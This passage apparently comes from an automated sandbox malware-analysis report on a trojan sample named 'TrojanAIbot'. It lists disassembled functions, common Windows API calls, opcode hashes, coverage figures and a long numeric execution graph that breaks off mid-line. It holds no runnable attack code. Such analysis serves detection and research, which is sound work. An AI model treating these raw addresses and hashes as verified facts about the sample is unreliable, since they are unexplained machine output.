                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 98254321178ba75110a7c69bbd289fc401324298feb6a00113f28a03d647e06e
                                                                                                                • Instruction ID: 1ba9467828062e5d9f7abef8aaacdf3411dbb5f72a83938ba5abdcf1f6ca3106
                                                                                                                • Opcode Fuzzy Hash: 98254321178ba75110a7c69bbd289fc401324298feb6a00113f28a03d647e06e
                                                                                                                • Instruction Fuzzy Hash: 401110B58002499FDB10DF9AC449BDEBFF8FB48324F10841AE918A7200C378A984CFA1
                                                                                                                Function 05EA21B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 195 5ea21b0-5ea31aa OleInitialize 197 5ea31ac-5ea31b2 195->197 198 5ea31b3-5ea31d0 195->198 197->198
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 05EA319D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 53d8d6820db51ea677dfb0ca9ec97b43781dcd261ae6d09a5269c2b862605309
                                                                                                                • Instruction ID: c1cede140e82d3147a39a46bb4c10f7bfd2252b745c20f92eaa70276d3537cb6
                                                                                                                • Opcode Fuzzy Hash: 53d8d6820db51ea677dfb0ca9ec97b43781dcd261ae6d09a5269c2b862605309
                                                                                                                • Instruction Fuzzy Hash: 661145B1800309CFDB10DFAAC444BDEBBF4EB48324F208859E559A7240C378A944CFA5
                                                                                                                Function 05EA225C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05EA3687), ref: 05EA4125
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DispatchMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 2061451462-0
                                                                                                                • Opcode ID: d6d464f378150f7a5d62b14271f80fb02965155348a6ffc915bb1854559e4aec
                                                                                                                • Instruction ID: dd3a15d90d62ce4758395c9cf996de78b132edee8f0ead14862a7e8b413aee9c
                                                                                                                • Opcode Fuzzy Hash: d6d464f378150f7a5d62b14271f80fb02965155348a6ffc915bb1854559e4aec
                                                                                                                • Instruction Fuzzy Hash: BD111DB5C046498FDB20DFAAD444BDEFBF4EB88224F10842AE458A7240D378A944CFA5
                                                                                                                Function 0549FC68 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 191 549fc68-549fcda SendMessageW 192 549fcdc-549fce2 191->192 193 549fce3-549fcf7 191->193 192->193
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 0549FCCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 9b796138b47cb57499764d445e4b63effca3689e692f018126bbab2d1265dd3c
                                                                                                                • Instruction ID: 8770ac30f7ad106feaa1591bfab03d67e6b2fa4ad994001488b5d665cace8cfe
                                                                                                                • Opcode Fuzzy Hash: 9b796138b47cb57499764d445e4b63effca3689e692f018126bbab2d1265dd3c
                                                                                                                • Instruction Fuzzy Hash: F21103B5810209DFDB10DF99D585BDEBBF4FB48314F10881AD958A7350C379A984CFA1
                                                                                                                Function 05EA3140 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 05EA319D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 58b857ad8f1bb647bdfc45954d6ab648997c837108bba9dcf1f883838dc86678
                                                                                                                • Instruction ID: efa95f8521aea31cf6fb75f79b7e11612e5880f3c62e1f20655b7856af9e339e
                                                                                                                • Opcode Fuzzy Hash: 58b857ad8f1bb647bdfc45954d6ab648997c837108bba9dcf1f883838dc86678
                                                                                                                • Instruction Fuzzy Hash: 661112B5800309CFDB10DFA9D585BCEBBF4FB48324F24885AD559A7250C339A944CFA5
                                                                                                                Function 05EA40C1 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05EA3687), ref: 05EA4125
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DispatchMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 2061451462-0
                                                                                                                • Opcode ID: 2a3edb99c006cdcd4306dcdb1cc6c3d1091f365b64ed46ee6e723aa657c270b1
                                                                                                                • Instruction ID: 4a8a95f508368e55a308e0524aa29b305172d6fad64a3c033f679c44b8e74a8b
                                                                                                                • Opcode Fuzzy Hash: 2a3edb99c006cdcd4306dcdb1cc6c3d1091f365b64ed46ee6e723aa657c270b1
                                                                                                                • Instruction Fuzzy Hash: AD1100B6C04649CFDB10CFAAD544BCEFBF4BB48314F10852AD458A7250C378A544CFA5
                                                                                                                Function 00F2D657 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F2D67E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: c1296de82013aedb1dc9805e1e9d6a89d6618d037c839871fe5149b10fc63e02
                                                                                                                • Instruction ID: a4b9d488fb8f43dc4771fd9df279b85ab2e5c74be7018839b83e51a02bf05067
                                                                                                                • Opcode Fuzzy Hash: c1296de82013aedb1dc9805e1e9d6a89d6618d037c839871fe5149b10fc63e02
                                                                                                                • Instruction Fuzzy Hash: 0DF017B58003198FDB10CF89E4047DEFBF0EB88328F24855AD059A7250C3B9A549CFA5
                                                                                                                Function 00F2D667 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F2D67E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 649e079aa128384da49fadb2baaafc4a8383a374e5a0c32f92db113545cdf6a8
                                                                                                                • Instruction ID: 55927ad2409670ce6357ea9a5e429e69398df3b6b148ba610d04002dbe7770e2
                                                                                                                • Opcode Fuzzy Hash: 649e079aa128384da49fadb2baaafc4a8383a374e5a0c32f92db113545cdf6a8
                                                                                                                • Instruction Fuzzy Hash: 75F039768043598EDB218F9AE4043CDFFE0AF59328F15854AC09DA7552C3782158CF95
                                                                                                                Function 00DAD005 Relevance: .1, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588246412.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dad000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9b1116fb2846e76aefa7ebfe2e6cfcfb0bbdafde6a1b233988f5745f554e2d20
                                                                                                                • Instruction ID: 34712f5eca2356e4ac2074358950249b89255adacbd6a8397e24f257a544a777
                                                                                                                • Opcode Fuzzy Hash: 9b1116fb2846e76aefa7ebfe2e6cfcfb0bbdafde6a1b233988f5745f554e2d20
                                                                                                                • Instruction Fuzzy Hash: 7631166110E3C08FD7178B3488A06517F71AF57224F1E80DBD999CE5E7C229884AC772
                                                                                                                Function 00DBD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588473917.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dbd000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da8d5bfdd97f28c9713adbbf6a415898cbf7168c4fa038fcfd1bf5f7e7ce8dc4
                                                                                                                • Instruction ID: a0d5739d55016c7405c03ea1f6b0783ccc263f7506226363214cb3d96959db85
                                                                                                                • Opcode Fuzzy Hash: da8d5bfdd97f28c9713adbbf6a415898cbf7168c4fa038fcfd1bf5f7e7ce8dc4
                                                                                                                • Instruction Fuzzy Hash: 59213471604200DFDB14EF14D9C0B56BB62FB88314F34C56DE84A4B282D33AD847CA71
                                                                                                                Function 00DBD005 Relevance: .1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588473917.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dbd000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d59cad7d061a03c9c57744a33355835e90af0669690640d9e26018f1942e704
                                                                                                                • Instruction ID: 1d4ff12794018359978885baa3e388245d661e981f896416d21a20690defef20
                                                                                                                • Opcode Fuzzy Hash: 7d59cad7d061a03c9c57744a33355835e90af0669690640d9e26018f1942e704
                                                                                                                • Instruction Fuzzy Hash: 12218E75509380CFCB02DF20D990755BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                                                                                Function 00DAD07D Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588246412.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dad000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b4bb2948eb121392663c2fa925cfe1ddc97c337ae37b40404426c80c2bf1fa91
                                                                                                                • Instruction ID: f28d0f566fe081988b22a95fcab9f8a9e9e0b47042a79a6648d616947db6df2f
                                                                                                                • Opcode Fuzzy Hash: b4bb2948eb121392663c2fa925cfe1ddc97c337ae37b40404426c80c2bf1fa91
                                                                                                                • Instruction Fuzzy Hash: 5801F2310043049EE7209B25CC84B67BF99EF42764F28C41AED4A0A682C679D882CA75
                                                                                                                Function 00DAD07C Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588246412.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dad000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df041d6721da172338d0a3f871abbd1e70e06c683071765916a6ba58d08b9eb0
                                                                                                                • Instruction ID: 20b32c1992c5ffdbfff5e3804285c5d882297948128de644b91a84b11df8def1
                                                                                                                • Opcode Fuzzy Hash: df041d6721da172338d0a3f871abbd1e70e06c683071765916a6ba58d08b9eb0
                                                                                                                • Instruction Fuzzy Hash: CBF0C2710053449EF7108A15CCC4B63FF98FB82774F18C05AED490A686C3799C40CA71

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:8.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1349
                                                                                                                Total number of Limit Nodes:12
                                                                                                                execution_graph 28103 2ccc350 28106 2cbf7c8 28103->28106 28105 2ccc358 28107 2cbf7d0 28106->28107 28107->28107 29235 2cb88b8 28107->29235 28109 2cbf7f1 28110 2cbf7f6 28109->28110 28111 2cbf850 28110->28111 28112 2cbf87b 28111->28112 29241 2cb89d0 28112->29241 28114 2cbf88e 28115 2cbf8b4 28114->28115 28116 2cbf8df 28115->28116 28117 2cb89d0 4 API calls 28116->28117 28118 2cbf8f2 28117->28118 28119 2cbf918 28118->28119 28120 2cbf922 28119->28120 28121 2cb89d0 4 API calls 28120->28121 28122 2cbf956 28121->28122 28123 2cbf986 28122->28123 28124 2cb89d0 4 API calls 28123->28124 28125 2cbf9ba 28124->28125 28126 2cbf9ea 28125->28126 28127 2cb89d0 4 API calls 28126->28127 28128 2cbfa1e 28127->28128 28129 2cbfa3c 28128->28129 28130 2cbfa4e 28129->28130 28131 2cb89d0 4 API calls 28130->28131 28132 2cbfa82 28131->28132 28133 2cbfaa0 28132->28133 28134 2cbfad3 28133->28134 28135 2cb89d0 4 API calls 28134->28135 28136 2cbfae6 28135->28136 28137 2ccb2f8 28136->28137 28138 2cbfaf3 28136->28138 29251 2cbf744 28138->29251 28140 2cbfaf8 28140->28137 28141 2cbfb1e 28140->28141 28142 2cb89d0 4 API calls 28141->28142 28143 2cbfb27 28142->28143 28144 2cb89d0 4 API calls 28143->28144 28145 2cbfb4e 28144->28145 28146 2cb89d0 4 API calls 28145->28146 28147 2cbfb81 28146->28147 28148 2cbfbd9 28147->28148 28149 2cbfbf1 28148->28149 28150 2cb89d0 4 API calls 28149->28150 28151 2cbfbfd 28150->28151 28152 2cb89d0 4 API calls 28151->28152 28153 2cbfc30 28152->28153 28154 2cbfc40 28153->28154 28155 2cb89d0 4 API calls 28154->28155 28156 2cbfc63 28155->28156 28157 2cb89d0 4 API calls 28156->28157 28158 2cbfc96 28157->28158 28159 2cbfcf9 28158->28159 28160 2cbfd06 28159->28160 28161 2cb89d0 4 API calls 28160->28161 28162 2cbfd12 28161->28162 28163 2cbfd75 28162->28163 28164 2cb89d0 4 API calls 28163->28164 28165 2cbfd8e 28164->28165 28166 2cb89d0 4 API calls 28165->28166 28167 2cbfdc1 28166->28167 28168 2cb89d0 4 API calls 28167->28168 28169 2cbfdf4 28168->28169 28170 2cb89d0 4 API calls 28169->28170 28171 2cbfe27 28170->28171 28172 2cbfe48 28171->28172 28173 2cbfe7f 28172->28173 28174 2cb89d0 4 API calls 28173->28174 28175 2cbfea3 28174->28175 28176 2cbfeb3 28175->28176 28177 2cb89d0 4 API calls 28176->28177 28178 2cbfed6 28177->28178 28179 2cb89d0 4 API calls 28178->28179 28180 2cbff09 28179->28180 28181 2cbff30 28180->28181 28182 2cb89d0 4 API calls 28181->28182 28183 2cbff3c 28182->28183 28184 2cbff94 28183->28184 28185 2cb89d0 4 API calls 28184->28185 28186 2cbffb8 28185->28186 28187 2cbffe4 28186->28187 28188 2cb89d0 4 API calls 28187->28188 28189 2cc0034 28188->28189 28190 2cc005b 28189->28190 28191 2cb89d0 4 API calls 28190->28191 28192 2cc0067 28191->28192 28193 2cb89d0 4 API calls 28192->28193 28194 2cc009a 28193->28194 28195 2cb89d0 4 API calls 28194->28195 28196 2cc00cd 28195->28196 28197 2cb89d0 4 API calls 28196->28197 28198 2cc0149 28197->28198 28199 2cb89d0 4 API calls 28198->28199 28200 2cc01c5 28199->28200 28201 2cb89d0 4 API calls 28200->28201 28202 2cc0241 28201->28202 28203 2cb89d0 4 API calls 28202->28203 28204 2cc02bd 28203->28204 28205 2cc02cc 28204->28205 28206 2cc0327 28205->28206 28207 2cc033f 28206->28207 28208 2cb89d0 4 API calls 28207->28208 28209 2cc0382 28208->28209 28210 2cc03a3 28209->28210 28211 2cc03bb 28210->28211 28212 2cb89d0 4 API calls 28211->28212 28213 2cc03fe 28212->28213 28214 2cc0414 28213->28214 28215 2cc0534 28214->28215 28216 2cc0427 28214->28216 28218 2cc0555 28215->28218 28217 2cc0448 28216->28217 28220 2cb89d0 4 API calls 28217->28220 28219 2cb89d0 4 API calls 28218->28219 28221 2cc05b0 28219->28221 28222 2cc04a3 28220->28222 28224 2cc05d1 28221->28224 28223 2cc04c4 28222->28223 28226 2cb89d0 4 API calls 28223->28226 28225 2cb89d0 4 API calls 28224->28225 28227 2cc051f 28225->28227 28226->28227 28228 2cc052f 28227->28228 28229 2cc066d 28228->28229 28230 2cb89d0 4 API calls 28229->28230 28231 2cc06c8 28230->28231 28232 2cc06e9 28231->28232 28233 2cb89d0 4 API calls 28232->28233 28234 2cc0744 28233->28234 28235 2cc0751 28234->28235 28236 2cc0794 28235->28236 28237 2cc07ec 28236->28237 28238 2cc0804 28237->28238 28239 2cb89d0 4 API calls 28238->28239 28240 2cc0810 28239->28240 28241 2cc0880 28240->28241 28242 2cb89d0 4 API calls 28241->28242 28243 2cc088c 28242->28243 28244 2cc08fc 28243->28244 28245 2cb89d0 4 API calls 28244->28245 28246 2cc0908 28245->28246 28247 2cc0978 28246->28247 28248 2cb89d0 4 API calls 28247->28248 28249 2cc0984 28248->28249 28250 2cc09c5 28249->28250 28251 2cc09fc 28250->28251 28252 2cc0a07 28251->28252 28253 2cb89d0 4 API calls 28252->28253 28254 2cc0a20 28253->28254 28255 2cc0a41 28254->28255 28256 2cc0a4c 28255->28256 28257 2cc0a78 28256->28257 28258 2cc0a83 28257->28258 28259 2cb89d0 4 API calls 28258->28259 28260 2cc0a9c 28259->28260 28261 2cc0abd 28260->28261 28262 2cc0ac8 28261->28262 28263 2cc0aff 28262->28263 28264 2cb89d0 4 API calls 28263->28264 28265 2cc0b18 28264->28265 28266 2cc0b22 28265->28266 28267 2cc0b2f 28266->28267 28268 2cc12fe 28267->28268 28269 2cc0b42 28267->28269 28270 2cc132a 28268->28270 28271 2cc0b63 28269->28271 28272 2cc1337 28270->28272 28274 2cc0b9a 28271->28274 28273 2cc1356 28272->28273 28275 2cc136e 28273->28275 28276 2cc0bb2 28274->28276 28277 2cb89d0 4 API calls 28275->28277 28278 2cb89d0 4 API calls 28276->28278 28279 2cc137a 28277->28279 28280 2cc0bbe 28278->28280 28281 2cc13a6 28279->28281 28282 2cc0bdf 28280->28282 28283 2cc13b3 28281->28283 28285 2cc0c16 28282->28285 28284 2cc13d2 28283->28284 28286 2cc13ea 28284->28286 28287 2cc0c2e 28285->28287 28288 2cb89d0 4 API calls 28286->28288 28289 2cb89d0 4 API calls 28287->28289 28292 2cc13f6 28288->28292 28290 2cc0c3a 28289->28290 28291 2cc0c5b 28290->28291 28293 2cc0c66 28291->28293 28294 2cc142f 28292->28294 28296 2cc0c92 28293->28296 28295 2cc144e 28294->28295 28297 2cc1466 28295->28297 28299 2cb89d0 4 API calls 28296->28299 28298 2cb89d0 4 API calls 28297->28298 28300 2cc1472 28298->28300 28301 2cc0cb6 28299->28301 28302 2cc1494 28300->28302 28303 2cc0cd8 28301->28303 28306 2cc14d0 28302->28306 28304 2cc0d09 28303->28304 28305 2cc0d14 28304->28305 28309 2cc0d40 28305->28309 28307 2cc14fc 28306->28307 28308 2cc1507 28307->28308 28311 2cc1514 28308->28311 28310 2cc0d58 28309->28310 28313 2cb89d0 4 API calls 28310->28313 28312 2cb89d0 4 API calls 28311->28312 28314 2cc1520 28312->28314 28315 2cc0d64 28313->28315 28317 2cc154c 28314->28317 28316 2cc0d85 28315->28316 28320 2cc0d90 28316->28320 28318 2cc1578 28317->28318 28319 2cc1583 28318->28319 28322 2cc1590 28319->28322 28321 2cc0dd4 28320->28321 28324 2cb89d0 4 API calls 28321->28324 28323 2cb89d0 4 API calls 28322->28323 28325 2cc159c 28323->28325 28326 2cc0de0 28324->28326 28328 2cc15c8 28325->28328 28327 2cc0e01 28326->28327 28329 2cc0e0c 28327->28329 28332 2cc15ff 28328->28332 28330 2cc0e43 28329->28330 28331 2cc0e50 28330->28331 28334 2cb89d0 4 API calls 28331->28334 28333 2cb89d0 4 API calls 28332->28333 28337 2cc1618 28333->28337 28335 2cc0e5c 28334->28335 28336 2cc0e71 28335->28336 28340 2cc0e84 28336->28340 28338 2cc1640 28337->28338 28339 2cc1661 28338->28339 28341 2cc1679 28339->28341 28342 2cc0ebd 28340->28342 28345 2cc16a3 28341->28345 28343 2cc0ee7 28342->28343 28344 2cc0ef4 28343->28344 28347 2cb89d0 4 API calls 28344->28347 28346 2cb89d0 4 API calls 28345->28346 28348 2cc16bc 28346->28348 28349 2cc0f00 28347->28349 28351 2cc16dd 28348->28351 28350 2cc0f39 28349->28350 28352 2cc0f63 28350->28352 28354 2cc171f 28351->28354 28353 2cc0f70 28352->28353 28356 2cb89d0 4 API calls 28353->28356 28355 2cb89d0 4 API calls 28354->28355 28357 2cc1738 28355->28357 28358 2cc0f7c 28356->28358 28359 2cc1759 28357->28359 28360 2cc0f9d 28358->28360 28362 2cc12f9 28358->28362 28361 2cc1790 28359->28361 28363 2cc0fbe 28360->28363 28364 2cc179b 28361->28364 28365 2cc2b11 28362->28365 28369 2cc0ff5 28363->28369 28366 2cc17a8 28364->28366 28371 2cc2b3b 28365->28371 28367 2cb89d0 4 API calls 28366->28367 28368 2cc17b4 28367->28368 28374 2cc17c3 28368->28374 28370 2cc100d 28369->28370 28373 2cb89d0 4 API calls 28370->28373 28372 2cb89d0 4 API calls 28371->28372 28377 2cc2b54 28372->28377 28375 2cc1019 28373->28375 28379 2cc17fe 28374->28379 28376 2cc103a 28375->28376 28378 2cc1045 28376->28378 28382 2cc2b8d 28377->28382 28383 2cc1071 28378->28383 28380 2cc182a 28379->28380 28381 2cc1835 28380->28381 28384 2cc1842 28381->28384 28385 2cc2bc4 28382->28385 28386 2cc1089 28383->28386 28387 2cb89d0 4 API calls 28384->28387 28389 2cb89d0 4 API calls 28385->28389 28390 2cb89d0 4 API calls 28386->28390 28388 2cc184e 28387->28388 28394 2cc187a 28388->28394 28393 2cc2bd0 28389->28393 28391 2cc1095 28390->28391 28392 2cc10b6 28391->28392 28398 2cc10c1 28392->28398 28397 2cc2c09 28393->28397 28395 2cc18a6 28394->28395 28396 2cc18b1 28395->28396 28399 2cc18be 28396->28399 28402 2cc2c40 28397->28402 28400 2cc1105 28398->28400 28401 2cb89d0 4 API calls 28399->28401 28405 2cb89d0 4 API calls 28400->28405 28403 2cc18ca 28401->28403 28404 2cb89d0 4 API calls 28402->28404 28403->28362 28408 2cc18dc 28403->28408 28409 2cc2c4c 28404->28409 28406 2cc1111 28405->28406 28407 2cc1132 28406->28407 28412 2cc113d 28407->28412 28410 2cc18fd 28408->28410 28411 2cc2c78 28409->28411 28417 2cc1915 28410->28417 28413 2cc2ca4 28411->28413 28414 2cc1174 28412->28414 28415 2cc2caf 28413->28415 28416 2cc1181 28414->28416 28418 2cb89d0 4 API calls 28415->28418 28419 2cb89d0 4 API calls 28416->28419 28422 2cb89d0 4 API calls 28417->28422 28420 2cc2cc8 28418->28420 28421 2cc118d 28419->28421 28420->28137 28426 2cc2ced 28420->28426 28423 2cc11ae 28421->28423 28424 2cc1958 28422->28424 28427 2cc11b9 28423->28427 28425 2cc1979 28424->28425 28430 2cc1991 28425->28430 28431 2cc2d26 28426->28431 28428 2cc11f0 28427->28428 28429 2cb89d0 4 API calls 28428->28429 28432 2cc1209 28429->28432 28433 2cb89d0 4 API calls 28430->28433 28434 2cb89d0 4 API calls 28431->28434 28435 2cc1213 28432->28435 28436 2cc19d4 28433->28436 28437 2cc2d69 28434->28437 28438 2cc1220 28435->28438 28439 2cc19de 28436->28439 28442 2cc2da2 28437->28442 28440 2cc129e 28438->28440 28445 2cc1a39 28439->28445 28441 2cc12b6 28440->28441 28444 2cc12d5 28441->28444 28443 2cb89d0 4 API calls 28442->28443 28448 2cc2de5 28443->28448 28446 2cc12e0 28444->28446 28447 2cc1a70 28445->28447 28450 2cb89d0 4 API calls 28446->28450 28449 2cb89d0 4 API calls 28447->28449 28453 2cc2e1e 28448->28453 28451 2cc1a7c 28449->28451 28450->28362 28452 2cc1a9d 28451->28452 28454 2cc1ab5 28452->28454 28455 2cc2e55 28453->28455 28457 2cc1ad4 28454->28457 28456 2cb89d0 4 API calls 28455->28456 28459 2cc2e61 28456->28459 28458 2cc1aec 28457->28458 28461 2cb89d0 4 API calls 28458->28461 28460 2cc2e8d 28459->28460 28464 2cc2e9a 28460->28464 28462 2cc1af8 28461->28462 28463 2cc1b19 28462->28463 28466 2cc1b31 28463->28466 28465 2cc2ec4 28464->28465 28467 2cb89d0 4 API calls 28465->28467 28469 2cc1b50 28466->28469 28468 2cc2edd 28467->28468 28471 2cc2ee7 28468->28471 28470 2cb89d0 4 API calls 28469->28470 28472 2cc1b74 28470->28472 28475 2cc2f09 28471->28475 28473 2cc1b95 28472->28473 28474 2cc1bad 28473->28474 28476 2cc1bcc 28474->28476 28477 2cc2f6c 28475->28477 28478 2cc1be4 28476->28478 28479 2cb89d0 4 API calls 28477->28479 28480 2cb89d0 4 API calls 28478->28480 28482 2cc2f85 28479->28482 28481 2cc1bf0 28480->28481 28484 2cc1c1c 28481->28484 28483 2cc2fb1 28482->28483 28485 2cc2fbe 28483->28485 28486 2cc1c48 28484->28486 28487 2cc2fdd 28485->28487 28488 2cc1c53 28486->28488 28489 2cc2fe8 28487->28489 28490 2cc1c60 28488->28490 28491 2cc2ff5 28489->28491 28493 2cb89d0 4 API calls 28490->28493 28492 2cb89d0 4 API calls 28491->28492 28498 2cc3001 28492->28498 28494 2cc1c6c 28493->28494 28495 2cc1c97 28494->28495 28496 2cc1cc3 28495->28496 28497 2cc1cd0 28496->28497 28499 2cc1cef 28497->28499 28500 2cc305a 28498->28500 28501 2cc1cfa 28499->28501 28502 2cc3091 28500->28502 28504 2cb89d0 4 API calls 28501->28504 28503 2cb89d0 4 API calls 28502->28503 28506 2cc309d 28503->28506 28505 2cc1d13 28504->28505 28507 2cc1d4c 28505->28507 28508 2cc30d6 28506->28508 28509 2cc1d76 28507->28509 28510 2cc310d 28508->28510 28512 2cb89d0 4 API calls 28509->28512 28511 2cb89d0 4 API calls 28510->28511 28515 2cc3119 28511->28515 28513 2cc1d8f 28512->28513 28514 2cc1db0 28513->28514 28517 2cc1dc8 28514->28517 28516 2cc3152 28515->28516 28518 2cc3171 28516->28518 28520 2cc1df2 28517->28520 28519 2cc317c 28518->28519 28521 2cc3189 28519->28521 28522 2cb89d0 4 API calls 28520->28522 28523 2cb89d0 4 API calls 28521->28523 28524 2cc1e0b 28522->28524 28525 2cc3195 28523->28525 28529 2cc1e36 28524->28529 28526 2cc31a6 28525->28526 28527 2cc31bc 28526->28527 28528 2cc31cf 28527->28528 28530 2cc31f0 28528->28530 28532 2cc1e6d 28529->28532 28531 2cc31fb 28530->28531 28533 2cc3208 28531->28533 28534 2cc1e85 28532->28534 28536 2cc3227 28533->28536 28535 2cb89d0 4 API calls 28534->28535 28540 2cc1eb2 28534->28540 28535->28534 28537 2cc3232 28536->28537 28538 2cc323f 28537->28538 28539 2cb89d0 4 API calls 28538->28539 28541 2cc324b 28539->28541 28542 2cc1eca 28540->28542 28547 2cc326c 28541->28547 28543 